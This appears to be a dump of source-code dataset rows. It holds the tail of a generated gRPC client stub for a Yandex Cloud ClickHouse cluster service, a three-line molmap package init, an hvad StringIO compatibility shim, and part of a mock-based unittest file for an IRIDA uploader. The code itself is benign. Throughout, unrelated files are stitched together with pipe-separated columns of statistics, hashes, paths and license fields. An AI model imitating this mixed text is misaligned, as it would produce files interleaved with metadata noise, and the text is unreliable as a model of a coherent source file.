yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Start(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/Start',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StartClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Stop(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/Stop',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StopClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Move(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/Move',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.MoveClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def AddZookeeper(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/AddZookeeper',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.AddClusterZookeeperRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Backup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/Backup',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.BackupClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Restore(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/Restore',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.RestoreClusterRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def RescheduleMaintenance(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/RescheduleMaintenance',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.RescheduleMaintenanceRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListLogs(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListLogs',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterLogsRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterLogsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def StreamLogs(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/StreamLogs',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StreamClusterLogsRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StreamLogRecord.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListOperations(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListOperations',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterOperationsRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterOperationsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListBackups(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListBackups',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterBackupsRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterBackupsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListHosts(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListHosts',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterHostsRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterHostsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def AddHosts(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/AddHosts',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.AddClusterHostsRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateHosts(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/UpdateHosts',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterHostsRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteHosts(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/DeleteHosts',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterHostsRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetShard(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/GetShard',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.GetClusterShardRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2.Shard.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListShards(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListShards',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardsRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def AddShard(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/AddShard',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.AddClusterShardRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateShard(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/UpdateShard',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterShardRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteShard(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/DeleteShard',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterShardRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetShardGroup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/GetShardGroup',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.GetClusterShardGroupRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2.ShardGroup.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListShardGroups(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListShardGroups',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardGroupsRequest.SerializeToString,
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterShardGroupsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateShardGroup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/CreateShardGroup',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.CreateClusterShardGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateShardGroup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/UpdateShardGroup',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterShardGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteShardGroup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/DeleteShardGroup',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterShardGroupRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateExternalDictionary(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/CreateExternalDictionary',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.CreateClusterExternalDictionaryRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteExternalDictionary(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.mdb.clickhouse.v1.ClusterService/DeleteExternalDictionary',
yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterExternalDictionaryRequest.SerializeToString,
yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 54.883186
| 165
| 0.709101
| 6,199
| 62,018
| 6.612034
| 0.033876
| 0.042817
| 0.066605
| 0.080877
| 0.923124
| 0.921318
| 0.914072
| 0.85869
| 0.854299
| 0.810018
| 0
| 0.008264
| 0.227337
| 62,018
| 1,129
| 166
| 54.931798
| 0.847096
| 0.037666
| 0
| 0.590349
| 1
| 0
| 0.093193
| 0.063901
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067762
| false
| 0
| 0.004107
| 0.032854
| 0.107803
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b1785fa6bfb825e7eb1d6baba2051bb7cbdc3644
| 152
|
py
|
Python
|
molmap/model/__init__.py
|
SuperXiang/bidd-molmap
|
f0f5da299e4da4ebae83eed81ddfdad31c707d92
|
[
"MIT"
] | 1
|
2021-04-01T05:06:16.000Z
|
2021-04-01T05:06:16.000Z
|
molmap/model/__init__.py
|
SuperXiang/bidd-molmap
|
f0f5da299e4da4ebae83eed81ddfdad31c707d92
|
[
"MIT"
] | null | null | null |
molmap/model/__init__.py
|
SuperXiang/bidd-molmap
|
f0f5da299e4da4ebae83eed81ddfdad31c707d92
|
[
"MIT"
] | null | null | null |
from molmap.model import cbks, loss, net, importance
from .model import RegressionEstimator
from .model import MultiClassEstimator, MultiLabelEstimator
| 38
| 59
| 0.848684
| 17
| 152
| 7.588235
| 0.647059
| 0.255814
| 0.232558
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 152
| 4
| 59
| 38
| 0.948529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b19155ff9890aba373abd9ff9f2292f79aa56674
| 133
|
py
|
Python
|
hvad/compat/string_io.py
|
aptivate/django-hvad
|
61457412eeae09b5df1c514a5b162230be125e1b
|
[
"BSD-3-Clause"
] | null | null | null |
hvad/compat/string_io.py
|
aptivate/django-hvad
|
61457412eeae09b5df1c514a5b162230be125e1b
|
[
"BSD-3-Clause"
] | null | null | null |
hvad/compat/string_io.py
|
aptivate/django-hvad
|
61457412eeae09b5df1c514a5b162230be125e1b
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
try:
from io import StringIO # python 3
except ImportError:
from StringIO import StringIO # python 2
| 22.166667
| 44
| 0.676692
| 18
| 133
| 5
| 0.722222
| 0.311111
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.029126
| 0.225564
| 133
| 5
| 45
| 26.6
| 0.84466
| 0.293233
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b19587429ba0c46a1a27dd721649ab8f9c6f73b4
| 25,258
|
py
|
Python
|
iridauploader/tests/core/test_upload.py
|
COMBAT-SARS-COV-2/irida-uploader
|
b9d04d187d6a5a9fdcaef5b27135965ffac99db0
|
[
"Apache-2.0"
] | 7
|
2019-01-25T16:56:11.000Z
|
2021-01-12T15:32:08.000Z
|
iridauploader/tests/core/test_upload.py
|
COMBAT-SARS-COV-2/irida-uploader
|
b9d04d187d6a5a9fdcaef5b27135965ffac99db0
|
[
"Apache-2.0"
] | 80
|
2019-01-29T14:54:26.000Z
|
2022-03-25T18:51:51.000Z
|
iridauploader/tests/core/test_upload.py
|
COMBAT-SARS-COV-2/irida-uploader
|
b9d04d187d6a5a9fdcaef5b27135965ffac99db0
|
[
"Apache-2.0"
] | 9
|
2019-03-14T09:58:05.000Z
|
2022-01-06T20:14:45.000Z
|
import unittest
from unittest.mock import patch, call
from os import path
import os
from iridauploader.api import MODE_DEFAULT
from iridauploader.core import upload, logger, exit_return
from iridauploader.config import config
from iridauploader.model import DirectoryStatus
path_to_module = path.abspath(path.dirname(__file__))
if len(path_to_module) == 0:
path_to_module = '.'
class TestUploadRunSingleEntry(unittest.TestCase):
"""
Tests the core.upload.upload_run_single_entry function
"""
# Reusable stubs
class StubValidationResult:
_valid = True
_error_count = 0
_error_list = []
def is_valid(self):
return self._valid
def error_count(self):
return self._error_count
@property
def error_list(self):
return self._error_list
class StubDirectoryStatus:
directory = path.join(path_to_module, "fake_ngs_data")
_status = DirectoryStatus.NEW
_message = ""
def status_equals(self, status):
return status == self._status
@property
def message(self):
return self._message
@property
def status(self):
return self._status
#
# @status.setter
# def status(self, status):
# self._status = status
def setUp(self):
print("\nStarting " + self.__module__ + ": " + self._testMethodName)
# config.setup()
config._init_config_parser()
def tearDown(self):
print("Cleaning up status file")
log_file_path = path.join(path_to_module, "fake_ngs_data", "irida-uploader.log")
if path.exists(log_file_path):
os.remove(log_file_path)
status_file_path = path.join(path_to_module, "fake_ngs_data", "irida_uploader_status.info")
if path.exists(status_file_path):
os.remove(status_file_path)
# Clean up the logger in the case where a test fails to complete
print("Cleaning up directory logger")
if logger.directory_logger:
logger.remove_directory_logger()
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_invalid_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function exits when directory status is invalid
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.INVALID
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory)
# verify result
self.assertEqual(result.exit_code, exit_return.EXIT_CODE_ERROR)
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload did not occur
mock_validate_and_upload.assert_not_called()
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_completed_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function exits when directory status is complete
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.COMPLETE
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory)
# verify result
self.assertEqual(result.exit_code, exit_return.EXIT_CODE_ERROR)
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload did not occur
mock_validate_and_upload.assert_not_called()
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_error_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function exits when directory status is error
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.ERROR
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory)
# verify result
self.assertEqual(result.exit_code, exit_return.EXIT_CODE_ERROR)
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload did not occur
mock_validate_and_upload.assert_not_called()
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_partial_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function exits when directory status is partial
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.PARTIAL
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory)
# verify result
self.assertEqual(result.exit_code, exit_return.EXIT_CODE_ERROR)
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload
mock_validate_and_upload.assert_not_called()
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_completed_force_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function with force when directory status is complete
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.COMPLETE
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_api_handler.get_default_upload_mode.side_effect = ["mock_mode"]
mock_validate_and_upload.side_effect = ["mock_result"]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory, force_upload=True)
# verify result
self.assertEqual(result, "mock_result")
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload
mock_validate_and_upload.assert_called_with(stub_directory_status, "mock_mode", False)
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_partial_force_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function continues with force when directory status is partial
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.PARTIAL
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_api_handler.get_default_upload_mode.side_effect = ["mock_mode"]
mock_validate_and_upload.side_effect = ["mock_result"]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory, force_upload=True)
# verify result
self.assertEqual(result, "mock_result")
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload
mock_validate_and_upload.assert_called_with(stub_directory_status, "mock_mode", False)
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_partial_continue_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function continues with force when directory status is partial
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.PARTIAL
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_api_handler.get_default_upload_mode.side_effect = ["mock_mode"]
mock_validate_and_upload.side_effect = ["mock_result"]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(
stub_directory_status.directory, force_upload=False, continue_upload=True)
# verify result
self.assertEqual(result, "mock_result")
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload
mock_validate_and_upload.assert_called_with(stub_directory_status, "mock_mode", True)
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_error_force_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function continues with force when directory status is error
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.ERROR
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_api_handler.get_default_upload_mode.side_effect = ["mock_mode"]
mock_validate_and_upload.side_effect = ["mock_result"]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory, force_upload=True)
# verify result
self.assertEqual(result, "mock_result")
# verify calls occurred
mock_parsing_handler.get_run_status.assert_called_with(stub_directory_status.directory)
# ensure upload
mock_validate_and_upload.assert_called_with(stub_directory_status, "mock_mode", False)
@patch("iridauploader.core.upload.upload_helpers")
@patch("iridauploader.core.upload._validate_and_upload")
@patch("iridauploader.core.upload.api_handler")
@patch("iridauploader.core.upload.parsing_handler")
def test_delayed_force_directory_status(self, mock_parsing_handler, mock_api_handler,
mock_validate_and_upload, mock_upload_helpers):
"""
Checks that function continues with force when directory status is delayed
:return:
"""
stub_directory_status = self.StubDirectoryStatus()
stub_directory_status._status = DirectoryStatus.DELAYED
mock_parsing_handler.get_run_status.side_effect = [stub_directory_status]
mock_api_handler.get_default_upload_mode.side_effect = ["mock_mode"]
mock_validate_and_upload.side_effect = ["mock_result"]
mock_upload_helpers.directory_has_readonly_conflict.side_effect = [False]
result = upload.upload_run_single_entry(stub_directory_status.directory, force_upload=True)
# verify result
self.assertEqual(result, "mock_result")
